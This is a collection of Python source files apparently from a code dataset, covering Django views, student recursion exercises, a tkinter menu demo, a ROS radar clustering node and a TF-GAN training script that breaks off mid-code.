elif(month == 1):\n month =12\n day =31\n year =year-1\n if (len(str(day)) == 1):\n id = \"0\" + str(day)\n else:\n id = str(day)\n\n if (len(str(month)) == 1):\n id = id + \"0\" + str(month)\n else:\n id = id + str(month)\n id = str(auth) + id + str(year)\n rep_id.append(id)\n day = day - 1\n all_inq = Inquiry.objects.all()\n num_of_inq2 = []\n for j in rep_id:\n count = 0\n for inq in all_inq:\n if (str(inq.report_id.report_id) == (j)):\n count += 1\n\n num_of_inq2.append(count)\n\n\n return rep_id,num_of_inq2\n\n\n\n","sub_path":"useract/all_views/externalUserView.py","file_name":"externalUserView.py","file_ext":"py","file_size_in_byte":6328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"94177024","text":"import uuid\nfrom matplotlib import pyplot as plt\n\nclass FloorElement:\n\n\tdef __init__(self, name=\"noName\", dimensions=(0,0), color=\"noColor\", elementID=\"noID\", elementType=\"noType\", clickCoordinates=(0,0), elementCoordinates=(0,0)):\n\t\tself.name = name\n\t\tself.dimensions = dimensions\n\t\tself.color = color\n\t\tself.elementID = elementID\n\t\tself.elementType = elementType\n\t\tself.clickCoordinates = clickCoordinates\n\t\tself.elementCoordinates = elementCoordinates\n\n\tdef drawElement(self):\n\t\tself.dimensions = list(map(int, input(\"sisesta elemendi mõõtmed (xx:yy): \").split(\":\")))\n\t\tprint(\"--- alustan joonistamist ---\")\n\t\tprint(f\"nimi: {self.name}\")\n\t\tprint(f\"mõõtmed: {self.dimensions}\")\n\t\tprint(f\"värv: {self.color}\")\n\t\tprint(f\"tüüp: {self.elementType}\")\n\n\tdef generateID(self):\n\t\tself.elementID = uuid.uuid4()\n\t\tprint(\"ID:\", self.elementID)\n\t\tprint(\"--- joonistamine lõpetatud ---\")\n\n\tdef coordinateCheck(self):\n\t\tself.elementCoordinates = list(map(int, input(\"sisesta elemendi koordinaadid (xx:yy): \").split(\":\")))\n\t\tself.clickCoordinates = list(map(int, input(\"sisesta kliki koordinaadid (xx:yy): \").split(\":\")))\n\n\t\tif((((self.clickCoordinates[0] < self.elementCoordinates[0]) and (self.dimensions[0] + self.elementCoordinates[0] > self.clickCoordinates[0])) and \n\t\t ((self.clickCoordinates[1] < self.elementCoordinates[1]) and (self.dimensions[1] + self.elementCoordinates[1] > self.clickCoordinates[1]))) \n\t\t\tor\n\t\t (((self.clickCoordinates[0] > self.elementCoordinates[0]) and (self.dimensions[0] + self.elementCoordinates[0] < self.clickCoordinates[0])) and \n\t\t ((self.clickCoordinates[1] > 
self.elementCoordinates[1]) and (self.dimensions[1] + self.elementCoordinates[1] < self.clickCoordinates[1])))):\n\t\t\tprint(\"klikk ei asu objektil\")\n\t\telse:\n\t\t\tprint(\"klikk asub elemendil ->\", self.name)\n\n\tdef export(self):\n\t\tx = [self.clickCoordinates[0], self.clickCoordinates[0], self.elementCoordinates[0], self.elementCoordinates[0]]\n\t\ty = [self.clickCoordinates[1], self.clickCoordinates[1], self.dimensions[1], self.dimensions[1]]\n\t\tplt.xlabel('x')\n\t\tplt.ylabel('y')\n\t\tplt.title('xx:yy koordinaatide graaf')\n\t\tplt.plot(x, y)\n\t\tplt.show()\n\t\t#mõõtmeid ei arvestata õigesti\n\nelements = [\n\tFloorElement(name=\"väike p6randa tykk\", color=\"sinine\", elementType=\"img\"),\n\tFloorElement(name=\"keskmine p6randa tykk\", color=\"punane\", elementType=\"txt\"),\n\tFloorElement(name=\"suur p6randa tykk\", color=\"l2bipaistev\", elementType=\"sym\")\n]\n\nfor element in elements:\n\telement.drawElement()\n\telement.generateID()\n\telement.coordinateCheck()\n\telement.export()\n","sub_path":"tarkvaraarendus/04 - graafiline redaktor.py","file_name":"04 - graafiline redaktor.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"253197118","text":"hwtime = 0\n\n#5\n#sum all numbers from 1 to n\nhwtime += 6\ndef nSum(n):\n if n == 1:\n return n\n else:\n return n + nSum(n-1)\n\n#6\n#return whether a string is a palindrome\nhwtime += 4\ndef isPalindrome(string):\n # s = reversed(string)\n return string == string[::-1]\n\nisPalindrome('abcba')\n\n\n#7\n#recursive method to compute x ** y\nhwtime += 14\ndef myPow(x, y):\n if y == 1:\n return x\n if y == -1:\n return 1/x\n if y < 0:\n prod = myPow(x, y + 1)\n return 1 / x * prod\n if y > 0:\n prod = myPow(x, y - 1)\n return prod * x\n\nmyPow(2, -4)\n\n#7b\n#reduced time complexity recursive method to compute x ** y\n\ndef myRPow(x, y):\n if y == 1:\n return x\n if y == -1:\n return 1/x\n else:\n divy = y // 2\n result = myRPow(x, divy)\n if y % 2 == 0:\n return result * result\n else:\n if y > 0:\n return result * result * x\n else:\n return result * result * (1 / x)\n\nmyRPow(2,-4)\n\n# def myRPow(x, y):\n# if y == 0:\n# return 1\n# divy = y // 2\n# result = myRPow(x, divy)\n# if y % 2 == 0:\n# return result * result\n# if y < 0:\n# if y == -1:\n# return 1 / x\n# if y % 2 == 0:\n# return result * result\n# else:\n# return result * result * (1 / x)\n# else:\n# return result * result * x\n\nmyRPow(2,-4)\n\n#8\n#recursively count how many 'x' exist in a string\nhwtime += 15\ndef countX(string):\n count = 0\n if string[0] == 'x' or string[0] == 'X':\n count = 1\n if len(string) > 1:\n count += countX(string[1:])\n return count\n\ncountX('jaxbX')\n\n\n#9\n#recursively count how many 6s are in a list of ints with a starting index\nhwtime += 10\ndef containsSix(s, index):\n if s[index] == 6:\n return True\n if len(s[index:]) > 1:\n return containsSix(s, index + 1)\n return False\n\ncontainsSix([1, 5, 8, 6], 2)\ncontainsSix([5, 2, 3, 1, 0], 1)\n\n#10a\n#recursively remove repeating adjacent characters\nhwtime += 25\ndef cleanString(s):\n if len(s) == 0:\n return ''\n stringnew = ''\n if len(s) > 1:\n if s[0] == s[1]:\n s = s[1:]\n stringnew = cleanString(s[1:])\n if s[0] != stringnew:\n return s[0] + stringnew\n return s[0]\n\ncleanString('helll')\n\n#10b\n#recursively remove repeating characters anywhere in string\nhwtime += 50\ndef removeDuplicateCharacters(s):\n return removeDuplicateCharactersHelper(s, set())\n\ndef 
removeDuplicateCharactersHelper(s, seenChars):\n stringpart = ''\n stringnew = ''\n if len(s) >= 1:\n if s[0] not in seenChars:\n seenChars.add(s[0])\n stringpart = s[0]\n if len(s) > 1:\n stringnew = removeDuplicateCharactersHelper(s[1:],seenChars)\n return stringpart + stringnew\n\nremoveDuplicateCharacters('yyzzzabccyb')\n\n#12\n#recursive bubblesort\n# def rBubSort(lst):\n # if lst[0] != min(lst)\nhwtime += 45\ndef rBubSort(lst):\n next = []\n while lst[0] != min(lst):\n if lst[0] > lst[1]:\n lst[0], lst[1] = lst[1], lst[0]\n next = rBubSort(lst[1:])\n lst = [lst[0]] + next\n # zeroth = [lst[0]]\n # return zeroth + next\n return lst\n\na = [3, 6, 1, -55, 8, 10, -3]\nrBubSort(a)\n\n\n#13\n#binary search\nhwtime += 90\ndef binSearch(lst, val):\n if len(lst) == 0:\n return False\n else:\n key = len(lst)//2\n if lst[key] == val:\n return True\n else:\n if val < lst[key]:\n return binSearch(lst[:key], val)\n else:\n return binSearch(lst[key+1:], val)\n\n\nb = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16]\nbinSearch(b, 6)\n\n\n#13b\n#binary search iteratively\n\ndef binSearchIter(lst, val):\n assert len(lst) > 0\n start = 0\n end = len(lst) - 1\n while start <= end:\n key = (start + end) // 2\n if lst[key] < val:\n start = key + 1\n elif lst[key] > val:\n end = key - 1\n else:\n break\n return lst[key] == val \n\nbinSearchIter(b, 3)\nc = [1, 2, 2]\nd = [-3, 0, 1, 4]\ne = []\nbinSearchIter(c, 2)\nbinSearchIter(c, 1)\nbinSearchIter(d, -3)\nbinSearchIter(d, 0)\n# binSearchIter(e, 0)","sub_path":"20181104/hw3.py","file_name":"hw3.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"426176908","text":"from controller import *\nfrom random import randint, random\n\n\ncontroller = Controller()\ndim = controller.getDim()\nwidth = dim[0]\nheight = dim[1]\n\nmyMap = [[[0, 0, 0] for y in range(height)] for x in range(width)]\n\ncompute = []\nnextC = []\n\nnumIslands = 1\ndisapear = .05\n#chooseStart\n\n\ndef genColor(ro, go, bo, x, y):\n\n r = myMap[x][y][0]\n g = myMap[x][y][1]\n b = myMap[x][y][2]\n if r+b+g <30:\n r = 255\n b = 255\n g = 255\n\n return [(ro)*r,(go)*g,(bo)*b]\n # return [(ro)*r,(ro)*r, (ro)*r]\n\ndef colorOdds():\n o = random()*-.3\n return o\n\ndef gen():\n global compute, nextC\n if len(compute) >0:\n for i in compute:\n x = i[0]\n y = i[1]\n o = i[2]\n if o > 0 and x >= 0 and x < width and y >= 0 and y < height and myMap[x][y] == [0, 0, 0]:\n odds = random()\n if odds <= i[2]:\n myMap[x][y]= genColor(colorOdds() + o, colorOdds()+ o, colorOdds() + o, i[3], i[4])\n controller.setPixel(x, y, myMap[x][y][0], myMap[x][y][1], myMap[x][y][2])\n nextC.append([x-1, y, o-random()*disapear, x, y])\n nextC.append([x+1, y, o-random()*disapear, x, y])\n nextC.append([x, y-1, o-random()*disapear, x, y])\n nextC.append([x, y+1, o-random()*disapear, x, y])\n # else:\n # print(x, y, \"did not\")\n controller.updateScreen(0)\n compute = nextC\n nextC = []\n gen()\n\ndef do(): \n global myMap \n for i in range(numIslands):\n x = randint(0,width)\n y = randint(0,height)\n compute.append([x, y, 1, 0, 0])\n gen()\n myMap = [[[0, 0, 0] for y in range(height)] for x in range(width)]\n\n\n# do()\nwhile True:\n do()\n controller.updateScreen(.1)\n\n","sub_path":"islandGenerationWeird.py","file_name":"islandGenerationWeird.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"318249288","text":"def divisors(x):\n div = []\n 
    divisor = 1\n    while divisor < x:\n        if x % divisor == 0:\n            div = div + [divisor]\n        divisor += 1\n    return div\n\ndef main():\n    n = input(\"Enter n: \")\n    n = int(n)\n\n    print(divisors(n))\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"week3/2-Resolve-with-Functions/divisors_with_f.py","file_name":"divisors_with_f.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"36248812","text":"\"\"\"\nParticipant views from both user and participant perspectives.\n\nAll of participant_(list|add|edit|view) are from the user perspective.\n\"\"\"\nfrom datetime import date\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.conf import settings\nfrom django.core.urlresolvers import reverse\nfrom django.forms.models import modelformset_factory\n\nfrom participants.models import Participant\nfrom participants.forms import (\n    AddParticipantForm,\n    EditParticipantForm,\n    MyTasksForm,\n)\nfrom participants.auth import authenticate, participant_required\nfrom tasks.models import Task\nfrom utilities.commonutils import get_current_group\n\n\nSESSION_KEY = getattr(settings, 'PARTICIPANT_AUTH_SESSION_KEY', 'participant')\n\n\ndef participant_list(request):\n    group = get_current_group(request)\n    if group is None:\n        return HttpResponseRedirect(reverse('index'))\n\n    participants = Participant.lists.active().filter(group=group)\n    selection = 'active'\n    table_headings = ('Given name',\n                      'Family name',\n                      'Receiving reminders?',\n                      )\n\n    if request.method == \"POST\":\n        if request.POST['button'] == 'inactive':\n            participants = Participant.lists.inactive().filter(group=group)\n            selection = 'inactive'\n        elif request.POST['button'] == 'former':\n            participants = Participant.lists.former().filter(group=group)\n            selection = 'former'\n\n    menu = {'parent': 'participants',\n            'child': 'manage_participants',\n            'tips': 'manage_participants'\n            }\n    return render(request, 'participant_list.html', {\n        'menu': menu,\n        'participants': participants,\n        'selection': selection,\n        'table_headings': table_headings,\n        })\n\n\ndef participant_add(request):\n    group = get_current_group(request)\n    if group is None:\n        return HttpResponseRedirect(reverse('index'))\n\n    if request.method == \"POST\":\n        form = AddParticipantForm(group, request.POST, label_suffix='')\n        if form.is_valid():\n            form.save(group)\n            return HttpResponseRedirect(reverse('participant-list'))\n    else:\n        form = AddParticipantForm(group, label_suffix='')\n\n    menu = {'parent': 'participants',\n            'child': 'new_participant',\n            'tips': 'new_participant'\n            }\n    return render(request, 'participant_add.html', {\n        'menu': menu,\n        'form': form,\n        })\n\n\ndef participant_edit(request, participant_id):\n    group = get_current_group(request)\n    if group is None:\n        return HttpResponseRedirect(reverse('index'))\n\n    participant = Participant.objects.get(pk=int(participant_id))\n    if participant.group != group:\n        return HttpResponseRedirect(reverse('index'))\n\n    if request.method == \"POST\":\n        if request.POST['button'] == 'delete_participant':\n            participant.delete()\n            return HttpResponseRedirect(reverse('participant-list'))\n        elif request.POST['button'] == 'save_participant':\n            form = EditParticipantForm(group, request.POST,\n                    instance=participant, label_suffix='')\n            if form.is_valid():\n                form.save(group)\n                return HttpResponseRedirect(reverse('participant-list'))\n    else:\n        form = EditParticipantForm(group, 
instance=participant,\n                                   label_suffix='')\n\n    menu = {'parent': 'participants',\n            'child': 'manage_participants',\n            'tips': 'edit_participant'\n            }\n    return render(request, 'participant_edit.html', {\n        'menu': menu,\n        'form': form,\n        'participant_id': participant_id\n        })\n\n\ndef participant_view(request, participant_id):\n    group = get_current_group(request)\n    if group is None:\n        return HttpResponseRedirect(reverse('index'))\n\n    participant = Participant.objects.get(pk=int(participant_id))\n    if participant.group != group:\n        return HttpResponseRedirect(reverse('index'))\n\n    incomplete_tasks = Task.lists.incomplete_tasks().\\\n        filter(participant=participant)\n    table_headings = ('Description', 'Deadline',)\n\n    menu = {'parent': 'participants', 'child': 'manage_participants'}\n    return render(request, 'participant_view.html', {\n        'menu': menu,\n        'participant': participant,\n        'table_headings': table_headings,\n        'incomplete_tasks': incomplete_tasks,\n        })\n\n\ndef my_tasks_auth(request, participant_id, token):\n    \"\"\"Authenticate a participant using a token from the last 30 days.\"\"\"\n    authenticate(request, participant_id, token)\n    return HttpResponseRedirect(reverse('my-tasks'))\n\n\n@participant_required\ndef my_tasks(request):\n    \"\"\"\n    Displays a list of the participant's outstanding tasks and\n    allows the participant to mark them as completed.\n    \"\"\"\n    participant_id = request.session.get(SESSION_KEY).get('id')\n    participant = Participant.objects.get(pk=int(participant_id))\n\n    MyTasksFormSet = modelformset_factory(\n        Task,\n        form=MyTasksForm,\n        extra=0,\n    )\n    formset_queryset = Task.lists.incomplete_tasks().\\\n        filter(participant=participant)\n\n    if request.method == \"POST\":\n        formset = MyTasksFormSet(request.POST)\n        if formset.is_valid():\n            formset.save(commit=False)\n            for form in formset:\n                participant_owns_task = (\n                    form.cleaned_data['id'].participant == participant\n                )\n                completion_date_set = form.cleaned_data['completion_date']\n                if participant_owns_task and completion_date_set:\n                    form.save()\n            return HttpResponseRedirect(reverse('my-tasks-done'))\n    else:\n        formset = MyTasksFormSet(queryset=formset_queryset)\n\n    return render(request, 'my_tasks.html', {\n        'participant': participant,\n        'formset_has_contents': formset_queryset.exists(),\n        'formset': formset,\n        })\n\n\n@participant_required\ndef my_tasks_done(request):\n    \"\"\"\n    Shows a success page with a list of the tasks which have been\n    marked as completed, and a list of tasks still outstanding.\n    \"\"\"\n    today = date.today()\n\n    participant_id = request.session.get(SESSION_KEY).get('id')\n    participant = Participant.objects.get(pk=int(participant_id))\n\n    tasks_outstanding = Task.lists.incomplete_tasks().\\\n        filter(participant=participant)\n    tasks_just_completed = Task.lists.completed_tasks().\\\n        filter(participant=participant).\\\n        filter(modified__gte=today).\\\n        filter(participant_set_status_completed=True)\n\n    return render(request, 'my_tasks_done.html', {\n        'participant': participant,\n        'no_of_tasks_outstanding': tasks_outstanding.count(),\n        'tasks_just_completed': tasks_just_completed,\n    })\n","sub_path":"participants/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"353440247","text":"import pytest\n\nfrom jupyterstan import parse_args\n\nDEFAULT_MODEL_NAME = \"_stan_model\"\n\nDEFAULT_OPTS = {\n    \"model_name\": DEFAULT_MODEL_NAME,\n    \"include_paths\": None,\n    \"boost_lib\": None,\n
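    # optional paths and libraries default to None\n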
\"eigen_lib\": None,\n \"verbose\": False,\n \"obfuscate_model_name\": True,\n}\n\n\ndef test_no_arguments():\n varname, opts = parse_args(\"\")\n assert varname == DEFAULT_MODEL_NAME\n assert opts == DEFAULT_OPTS\n\n\ndef test_model_name():\n test_name = \"test_name\"\n varname, opts = parse_args(test_name)\n test_opts = DEFAULT_OPTS\n test_opts[\"model_name\"] = varname\n assert varname == \"test_name\"\n assert opts == test_opts\n\n\ndef test_invalid_model_name():\n test_name = \"0test_name\"\n with pytest.raises(ValueError):\n varname, opts = parse_args(test_name)\n","sub_path":"tests/test_parsing_arguments.py","file_name":"test_parsing_arguments.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"83113437","text":"from tkinter import *\nimport tkinter.messagebox\n\ndef askquit():\n answer = tkinter.messagebox.askokcancel(\"are you sure\",\"wana exit\");\n\n if(answer):\n print(\"Exit\")\n quit();\n\ndef demo():\n print(\"I am demo\");\n root.geometry(\"400x400\");\n \ndef work():\n print(\"Resize window\");\n root.geometry(\"200x200\");\ndef work1():\n print(\"Resize window\");\n root.geometry(\"400x400\");\n\n\nroot = Tk();\nroot.geometry(\"400x400\");\n\nmenu1= Menu(root);\nroot.config(menu=menu1);\n\nsubmenu = Menu(menu1);\nmenu1.add_cascade(label=\"File\", menu=submenu);\nsubmenu.add_command(label=\"New\", command=demo)\nsubmenu.add_command(label=\"open\")\nsubmenu.add_command(label=\"Save\")\nsubmenu.add_command(label=\"Save as\")\nsubmenu.add_command(label=\"Exit\", command=askquit)\n\nsubmenu2 = Menu(menu1);\nmenu1.add_cascade(label=\"Edit\", menu=submenu2);\nsubmenu2.add_command(label=\"Resize\",command=work)\nsubmenu2.add_command(label=\"Reset\",command=work1)\n\nsubmenu3 = Menu(menu1);\nmenu1.add_cascade(label=\"View\", menu=submenu3);\n\nsubmenu4 = Menu(menu1);\nmenu1.add_cascade(label=\"Language\", menu=submenu4);\n\nsubmenu5 = Menu(menu1);\nmenu1.add_cascade(label=\"Tools\", menu=submenu5);\n\nsubmenu6 = Menu(menu1);\nmenu1.add_cascade(label=\"Exit\", menu=submenu6);\n\n\n\n\nroot.mainloop()","sub_path":"gui/custome_quit.py","file_name":"custome_quit.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"201835651","text":"#!/usr/bin/python\n# coding=utf-8\n# -*- encoding: utf-8 -*-\n\nfrom datetime import datetime\n\nclass period:\n \n def __init__(self, start, end, isLocked):\n self.start = start\n self.end = end\n self.isLocked = isLocked\n","sub_path":"battleground/period.py","file_name":"period.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"400087017","text":"#/////////////////////////////////////////////////////////////////////////\n# script: createFinalOutDir.py\n# author: Lincoln\n# date: 3.18.19\n#\n# want to make one big dir with all of my filtered/unfiltered cells: \n# scVCF_filtered_all/\n# would be much nicer to do this on a jupyter notebook, buttt thats harder from EC2\n# potential problem here is gonna be that we've got vcf AND csv files in this \n# output dir\n#/////////////////////////////////////////////////////////////////////////\nimport os \nimport shutil \n\nfilterDir = '/home/ubuntu/code/SNP_calling_pipeline/bulkAnalysis/filteredOut/'\nfilterDir_list = os.listdir(filterDir)\n\nfilteredCells = []\nfor f in filterDir_list:\n\tcell = 
for f in filterDir_list:\n\tcell = f[:-len('_unique.vcf')]\n\tfilteredCells.append(cell)\n\n\nepiDir = '/home/ubuntu/code/SNP_calling_pipeline/bulkAnalysis/scVCF/'\nepiDir_list = os.listdir(epiDir)\n\nepiCells = []\nfor f in epiDir_list:\n\tcell = f[:-len('.vcf')]\n\tepiCells.append(cell)\n\n# get cells in epiCells but NOT filteredCells\nnonFilteredCells = set(epiCells) - set(filteredCells)\n\nnonFilteredCells_list = []\nfor cell in nonFilteredCells:\n\tf = cell + '.vcf'\n\tnonFilteredCells_list.append(f)\n\n\n# copy over the non-filtered cells\noutPATH = '/home/ubuntu/code/SNP_calling_pipeline/bulkAnalysis/scVCF_filtered_all/'\nfor file in nonFilteredCells_list:\n\tsrc = epiDir + file\n\tdst = outPATH + file\n\tshutil.copyfile(src, dst)\n\n# copy over all the filtered cells\nfor file in filterDir_list:\n\tf = file[:-len('_unique.vcf')]\n\tf = f + '.vcf'\n\tsrc = filterDir + file\n\tdst = outPATH + f\n\tshutil.copyfile(src, dst)\n\n#/////////////////////////////////////////////////////////////////////////\n#/////////////////////////////////////////////////////////////////////////","sub_path":"bulkAnalysis/createFinalOutDir.py","file_name":"createFinalOutDir.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"473743181","text":"#!/usr/bin/env python\nimport rospy\nimport math\nimport ros_numpy\nimport numpy as np\nfrom sensor_msgs.msg import PointCloud2\nimport std_msgs.msg\nimport sensor_msgs.point_cloud2 as pcl2\nfrom sklearn.cluster import DBSCAN\nfrom collections import Counter\nimport matplotlib.pyplot as plt\n\n\n\"\"\"\nDirection Convention:\ny-axis = Sideways, right -ve \nx-axis = Front and back, front +ve\n\"\"\"\ndef get_cluster(arr):\n    db = DBSCAN(eps=0.05, min_samples=3).fit(arr)\n    labels = db.labels_\n    Counter(labels)\n    core_samples_mask = np.zeros_like(db.labels_, dtype=bool)\n    core_samples_mask[db.core_sample_indices_] = True\n    labels = db.labels_\n    n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)\n    unique_labels = set(labels)\n    colors = plt.cm.Spectral(np.linspace(0, 1, len(unique_labels)))\n    ans = []\n\n    for k, col in zip(unique_labels, colors):\n        if k == -1:\n            # Black used for noise.\n            col = 'k'\n\n        class_member_mask = (labels == k)\n\n        xy = arr[class_member_mask & ~core_samples_mask]\n        if (k != -1):\n            point = np.mean(xy, axis=0)\n            ans.append(point)\n        xy = arr[class_member_mask & core_samples_mask]\n\n    points = np.asarray(ans)\n    # print(np.shape(points))\n    return points\n\ndef compute_velocity(points):\n    time_elapsed = 0.0338\n    print(points)\n    if (len(points) > 0):\n        print(\"Computing for this\")\n    pass\n\n\ndef callback(data):\n    pc = ros_numpy.numpify(data)\n    # points=np.zeros((pc.shape[0],3))\n    # points[:,0]=pc['x']\n    # points[:,1]=pc['y']\n    # points[:,2]=pc['z']\n    # x = points[:,0]\n    # y = points[:,1]\n    # z = points[:,2]\n    # print(pc)\n\n    vals = []\n\n\n    # Filtering out the far-off points\n    for p in pc:\n        if (0.2 < p['x'] < 5):\n            if (-1.0 < p['y'] < 1.0):\n                vals.append(p)\n\n    vals = np.asarray(vals)\n    points = np.zeros((vals.shape[0], 3))\n    points[:, 0] = vals['x']\n    points[:, 1] = vals['y']\n    points[:, 2] = vals['z']\n    # print(\"Printing the vals\")\n    # print(points)\n    # print(np.shape(vals), np.shape(pc))\n    # print(\"#\"*35)\n    ans = get_cluster(points)\n    # print(\"#\"*35)\n    # print(ans)\n    # print(\"#\"*35)\n\n    # compute_velocity(ans) # Currently not working as timestamp is zero\n\n    # Code to publish points\n    pcl_pub = rospy.Publisher(\"/deltarc_radar_position\", PointCloud2, queue_size=10)\n
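    # publish the cluster centroids (re-creating the Publisher on every callback works, but creating it once in reader() would be cheaper)\n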
    # cloud_points = [[0, -1.5, 0.0], [0, 1.5, 0.0], [5, -1.5, 0.0], [5, 1.5, 0.0]]  # leftover debug frame: corners of the filter window\n    cloud_points = ans\n    # header\n    header = std_msgs.msg.Header()\n    header.stamp = rospy.Time.now()\n    header.frame_id = 'ti_mmwave_pcl'\n    # create pcl from points\n    scaled_polygon_pcl = pcl2.create_cloud_xyz32(header, cloud_points)\n    # publish\n    pcl_pub.publish(scaled_polygon_pcl)\n\n\ndef reader():\n    # pub = rospy.Publisher('chatter', String, queue_size=10)\n    rospy.init_node('clustered_data', anonymous=True)\n    rospy.loginfo(\"Getting the data\")\n    cloud = rospy.Subscriber(\"/ti_mmwave/radar_scan_pcl\", PointCloud2, callback)\n    rospy.spin()\n    # rate = rospy.Rate(10) # 10hz\n    # while not rospy.is_shutdown():\n    #     hello_str = \"hello world %s\" % rospy.get_time()\n    #     rospy.loginfo(hello_str)\n    #     pub.publish(hello_str)\n    #     rate.sleep()\n\nif __name__ == '__main__':\n    try:\n        reader()\n    except rospy.ROSInterruptException:\n        pass","sub_path":"radar_clustering.py","file_name":"radar_clustering.py","file_ext":"py","file_size_in_byte":3242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"466292910","text":"\"\"\"Trains a GANEstimator on Magic data.\"\"\"\n\nimport os\nimport multiprocessing\n\nimport numpy as np\nimport scipy.misc\nimport tensorflow as tf\nimport tensorflow.contrib.gan as tfgan\n\nfrom utils import data_provider\nfrom utils import networks\nfrom utils import download_and_convert_magic\n\nFLAGS = tf.flags.FLAGS\n\n\ndef define_flags():\n    tf.flags.DEFINE_integer('batch_size', 32,\n                            'The number of images in each train batch.')\n    tf.flags.DEFINE_integer('max_number_of_steps', 50000,\n                            'The maximum number of gradient steps.')\n    tf.flags.DEFINE_integer('noise_dims', 512,\n                            'Dimensions of the generator noise vector')\n    tf.flags.DEFINE_integer('image_dims', 256,\n                            'The size images should be resized to')\n\n    tf.flags.DEFINE_string('dataset_dir', './magic_data/', 'Location of data.')\n    tf.flags.DEFINE_string('eval_dir', '/tmp/magic-estimator/',\n                           'Directory where the results images are saved to.')\n    tf.flags.DEFINE_string('model_dir', './magic-model/',\n                           'Directory where the checkpoints and model are saved.')\n    tf.flags.DEFINE_string('gen_dir', './gen_img/',\n                           'Directory where the images from summaries are saved.')\n\n    tf.flags.DEFINE_integer('kmp_blocktime', 0,\n                            'Sets the time, in milliseconds, that a thread should wait, after completing the '\n                            'execution of a parallel region, before sleeping.')\n    tf.flags.DEFINE_integer('kmp_settings', 1,\n                            'Enables (true) or disables (false) the printing of OpenMP* run-time library environment '\n                            'variables during program execution.')\n
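    # 0 leaves OMP_NUM_THREADS unset (see the environment block below)\n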
    tf.flags.DEFINE_integer('num_intra_threads', 0,\n                            'Specifies the number of threads to use. 0 will result in the value being set to the '\n                            'number of logical cores')\n    tf.flags.DEFINE_string('kmp_affinity', 'granularity=fine,verbose,compact,1,0',\n                           'Enables the run-time library to bind threads to physical processing units.')\n\n    tf.flags.DEFINE_integer('num_parallel_readers', multiprocessing.cpu_count(),\n                            'Level of parallelism.')\n    tf.flags.DEFINE_integer('num_parallel_calls', multiprocessing.cpu_count(),\n                            'Level of parallelism.')\n    tf.flags.DEFINE_integer('prefetch_buffer_size', 1,\n                            'Number of elements in the prefetch buffer '\n                            '(should equal the number of elements consumed by one training step).')\n    tf.flags.DEFINE_integer('shuffle_buffer_size', 1000,\n                            'The number of elements from this dataset from which the new dataset will sample.')\n\n    os.environ[\"KMP_BLOCKTIME\"] = str(FLAGS.kmp_blocktime)\n    os.environ[\"KMP_SETTINGS\"] = str(FLAGS.kmp_settings)\n    os.environ[\"KMP_AFFINITY\"] = FLAGS.kmp_affinity\n    if FLAGS.num_intra_threads > 0:\n        os.environ[\"OMP_NUM_THREADS\"] = str(FLAGS.num_intra_threads)\n\n\ndef _generator(noise, mode):\n    \"\"\"generator with extra argument for tf.Estimator's `mode`.\"\"\"\n    is_training = (mode == tf.estimator.ModeKeys.TRAIN)\n    return networks.generator(noise, is_training=is_training)\n\n\ndef save_images_from_events_summaries(output_dir):\n    if not tf.gfile.Exists(output_dir):\n        tf.gfile.MakeDirs(output_dir)\n    with tf.Session():\n        for data_filename in os.listdir(FLAGS.model_dir):\n            if 'events.out' not in data_filename:\n                continue\n\n            image_str = tf.placeholder(tf.string)\n            im_tf = tf.image.decode_image(image_str)\n            try:\n                for e in tf.train.summary_iterator(os.path.join(FLAGS.model_dir, data_filename)):\n                    for v in e.summary.value:\n                        if not v.tag == 'generated_data/image':\n                            continue\n                        im = im_tf.eval({image_str: v.image.encoded_image_string})\n                        output_fn = os.path.realpath('{}/image_{:05d}.png'.format(output_dir, e.step))\n                        print(\"Saving '{}'\".format(output_fn))\n                        scipy.misc.imsave(output_fn, im)\n            except tf.errors.DataLossError:\n                pass\n\n\ndef main(_):\n    tf.logging.set_verbosity(tf.logging.INFO)\n\n    define_flags()\n\n    if not tf.gfile.Exists(FLAGS.dataset_dir):\n        tf.gfile.MakeDirs(FLAGS.dataset_dir)\n        download_and_convert_magic.run(FLAGS.dataset_dir)\n\n    shape = download_and_convert_magic.get_shape()\n\n    # Initialize GANEstimator with options and hyperparameters.\n    gan_estimator = tfgan.estimator.GANEstimator(\n        generator_fn=_generator,\n        discriminator_fn=networks.discriminator,\n        generator_loss_fn=tfgan.losses.wasserstein_generator_loss,\n        discriminator_loss_fn=tfgan.losses.wasserstein_discriminator_loss,\n        generator_optimizer=tf.train.AdamOptimizer(0.001, 0.5, use_locking=True),\n        # discriminator_optimizer=tf.train.GradientDescentOptimizer(0.5, use_locking=True),\n        discriminator_optimizer=tf.train.AdamOptimizer(0.0001, 0.5),\n        add_summaries=tfgan.estimator.SummaryType.IMAGES,\n        model_dir=FLAGS.model_dir,\n        config=tf.estimator.RunConfig(keep_checkpoint_max=3),\n        # can't use because still not functional #, train_distribute=tf.contrib.distribute.MirroredStrategy()),\n        get_hooks_fn=tfgan.get_joint_train_hooks(\n            